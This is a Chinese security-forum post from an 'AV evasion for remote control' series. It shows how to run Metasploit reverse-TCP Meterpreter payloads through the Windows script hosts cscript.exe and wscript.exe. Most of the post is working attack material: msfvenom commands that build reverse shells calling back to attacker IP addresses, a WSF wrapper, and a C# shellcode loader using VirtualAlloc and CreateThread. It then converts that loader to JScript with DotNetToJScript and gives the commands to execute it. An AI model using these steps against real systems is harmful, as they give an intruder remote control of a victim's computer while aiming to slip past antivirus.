安全矩阵

 找回密码
 立即注册
搜索
查看: 4254|回复: 0

远控免杀专题(62)-白名单CScript/WScript执行payload

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-3-31 19:28:03 | 显示全部楼层 |阅读模式
本文转自:远控免杀专题(62)-白名单CScript/WScript执行payload

一、CScript/WScript介绍
系统文件cscript.exe是存放在Windows系统文件夹中的重要文件,通常情况下是在安装操作系统过程中自动创建的,对于系统正常运行来说至关重要,Windows Script Host引擎在cscript.exe来寻找和连接脚本的运行库,最常见的有VBScript和JavaScript。

wscript全称“Windows Scripting Host”,是一种批次语言/自动执行工具——它所对应的程序“wscript.exe”是一个脚本语言解释器,位于C:\WINDOWS\system32目录下,正是它才使得脚本可以被执行,就象执行批处理一样,可以拿来执行.wsh,.vbs,.js等。

WScript是一个窗口化的版本;CScript是一个命令行的版本。两种版本都可以运行任何脚本。二者之间的区别是,窗口化版本(WScript)使用一个弹出对话框来显示文本输出消息,而命令行版本(CSCript)通过命令行程序所见的、常规的“标准输出”方法来显示文本。

CScript/WScript可以用来执行vbs和js等脚本,是否能达到免杀的目的取决于执行的脚本本身的免杀能力。

二、使用CScript/WScript执行vbs脚本

使用msfvenom生成vbs脚本的反弹木马。
  1. msfvenom -p windows/meterpreter/reverse_tcp  LHOST=172.16.100.207 lport=4444 -f vbs > TIDE.vbs
复制代码



使用cscript.exe执行生成的vbs脚本。
  1. cscript.exe TIDE.vbs
复制代码



反弹成功。


使用WScript.exe执行vbs反弹脚本,可以见到和cscript.exe相比命令行中没有文本输出信息。
  1. WScript.exe TIDE.vbs
复制代码



msf上线成功。




三、使用CScript/WScript执行wsf反弹脚本

wsf文件是一种windows脚本文件,是一个包含可扩展标记语言(XML)代码的文本文档。把msf生成的反弹vbs代码放入到<script>标签中。
  1. <package>
  2. <job  id="IncludeExample">     
  3.         <script language="VBScript">   
  4.                            #vbs代码     
  5.         </script>
  6. </job>
  7. </package>
复制代码


使用cscript.exe执行wsf脚本。
  1. cscript.exe TIDE.wsf
复制代码


反弹成功。



使用WScript.exe执行wsf脚本。
  1. WScript.exe TIDE.wsf
复制代码


msf上线成功。



四、使用CScript/WScript执行js反弹脚本


首先需要制作一个js反弹文件,和专题39方法一致。
1、生成基于csharp的shellcode,我们要借助于 C# 来执行生成的 Payload,所以格式要选择为 csharp。
  1. msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f csharp LHOST=10.211.55.2 LPORT=3333 -o shell_x86.csharp
复制代码
2、然后在vs2017中创建C#的Console⼯程,.Net版本建议2.0,这样兼容性好⼀一 些,如果选了了net 4.0。其他电脑上没有装4.0的话可能就没法运⾏了。代码如下,把 shell_x86.csharp 内容放到相应MsfPayload位置。

  1. using System;
  2. using System.Threading;
  3. using System.Runtime.InteropServices;
  4. namespace MSFWrapper
  5. {
  6.     public class Program
  7.     {
  8.         public Program()
  9.         {
  10.            RunMSF();
  11.         }
  12.         public static void RunMSF()
  13.         {
  14.             byte[] MsfPayload = {
  15.             //Paste your Payload here
  16.         };
  17.             IntPtr returnAddr = VirtualAlloc((IntPtr)0, (uint)Math.Max(MsfPayload.Length, 0x1000), 0x3000, 0x40);
  18.             Marshal.Copy(MsfPayload, 0, returnAddr, MsfPayload.Length);
  19.             CreateThread((IntPtr)0, 0, returnAddr, (IntPtr)0, 0, (IntPtr)0);
  20.             Thread.Sleep(2000);
  21.         }
  22.         public static void Main()
  23.         {
  24.         }
  25.         [DllImport("kernel32.dll")]
  26.         public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
  27.         [DllImport("kernel32.dll")]
  28.         public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
  29.     }
  30. }
复制代码
然后将先前生成的 Payload 的黏贴到代码中注释为“//Paste your Payload here”的地方。保存代码后,修改该工程的属性,将输出类型改为“Windows 应用程序”,启动对象改为“MSFWrapper.Program”, 然后保存。增加 Release 版的 x86 编译对象,然后生成了ConsoleApp2.exe。


3、将exe转换为脚本⽂文件下载DotNetToJScript: https://raw.githubusercontent.com/TideSec/BypassAntiVi rus/master/tools/DotNetToJScript.zip
将上⾯⽣成的 ConsoleApp2.exe 复制到DotNetToJScript⽬目录下,执⾏命令生成TIDE.js文件
  1. DotNetToJScript.exe -l=JScript -o=TIDE.js -c=MSFWrapper.Program ConsoleApp2.exe
复制代码
使用cscript/WScript执行
  1. cscript.exe  MSFWrapper.js
  2. WScript.exe MSFWrapper.js
复制代码
成功上线


五、总结
cscript/WScript无论是加载vbs,还是wsf和js,都会被360和火绒查杀到,因此想要绕过杀软还需要对vbs,和js脚本进行免杀处理。

vt查杀率32/57

六、参考资料
免杀 MSF Windows Payload 的方法与实践

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 21:53 , Processed in 0.012960 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表